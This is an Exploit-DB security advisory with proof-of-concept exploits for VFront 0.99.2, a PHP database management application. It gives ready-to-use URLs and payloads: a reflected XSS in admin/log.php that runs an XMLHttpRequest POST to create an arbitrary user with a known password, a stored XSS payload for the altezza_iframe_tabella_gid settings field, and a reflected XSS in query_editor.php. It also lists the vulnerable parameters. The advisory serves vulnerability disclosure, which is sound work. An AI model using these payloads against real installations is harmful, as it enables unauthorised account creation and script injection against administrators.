VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

03 Jun 2015 | Reported by hyp3rlinx | Type: exploitdb | Source: www.exploit-db.com

VFront 0.99.2, a PHP web-based database management application, is affected by CSRF, persistent XSS and reflected XSS.

Code
# Exploit Title:  CSRF & Persistent XSS
# Google Dork: intitle: CSRF & Persistent XSS
# Date: 2015-06-02
# Exploit Author:  John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: www.vfront.org
# Software Link: www.vfront.org
# Version: 0.99.2
# Tested on: Windows 7
# Category: webapps


Product:
===================================================================================
vfront-0.99.2 is a PHP web-based MySQL and PostgreSQL database management application.



Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS



Vulnerability Detail(s):
=======================


CSRF:
=========
The user-creation endpoint admin/utenze.db.php?insert_new accepts its POST without any anti-CSRF token, so a request forged on behalf of a logged-in administrator adds an arbitrary user to the system.


Persistent XSS:
================
admin/variabili.php (the settings page) has multiple XSS vectors in its POST parameters. One input field, 'altezza_iframe_tabella_gid', stores the XSS payload
in the MySQL database; the payload is then rendered back into the page and executes each time variabili.php is opened in a victim's browser.


Persistent XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)
To check an existing installation for an injected payload, inspect the valore column of that table for markup (a less-than sign or the word script); because the value is written into variabili.php without escaping, the payload keeps firing until the row is cleaned.


Exploit code(s):
===============


CSRF: add arbitrary users to the system
=======================================
The PoC below uses the reflected XSS in the 'op' parameter of admin/log.php to run a script that fires a same-origin XMLHttpRequest POST to utenze.db.php?insert_new; '=' and '&' inside the payload are percent-encoded as %3d and %26 so they are not parsed as part of the outer query string. Because insert_new checks no token, the same POST can equally be submitted from an attacker-controlled page while an administrator is logged in.
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%[email protected]%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All



Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Submit the following payload in the 'altezza_iframe_tabella_gid' input field; it is stored in the database and rendered on every later load of the page.
"/><script>alert(666)</script>



Reflected XSS:
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>



XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid   <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid

  

Disclosure Timeline:
===================================


Vendor Notification: May 31, 2015
Public Disclosure:   June 2, 2015



Severity Level:
===================================
High



Description:
==========================================================

Request Method(s):
                                [+]  GET & POST

Vulnerable Product:
                                [+]  vfront-0.99.2

Vulnerable Parameter(s):
                                [+]  altezza_iframe_tabella_gid
                                     passo_avanzamento_veloce_gid
                                     n_record_tabella_gid
                                     search_limit_results_gid
                                     max_tempo_edit_gid
                                     home_redirect_gid
                                     formati_attach_gid
                                     default_group_ext_gid
                                     cron_days_min_gid
                                     id_campo
                                     op


Affected Area(s):               [+]  Admin & MySQL DB

===============================================================



(hyp3rlinx)
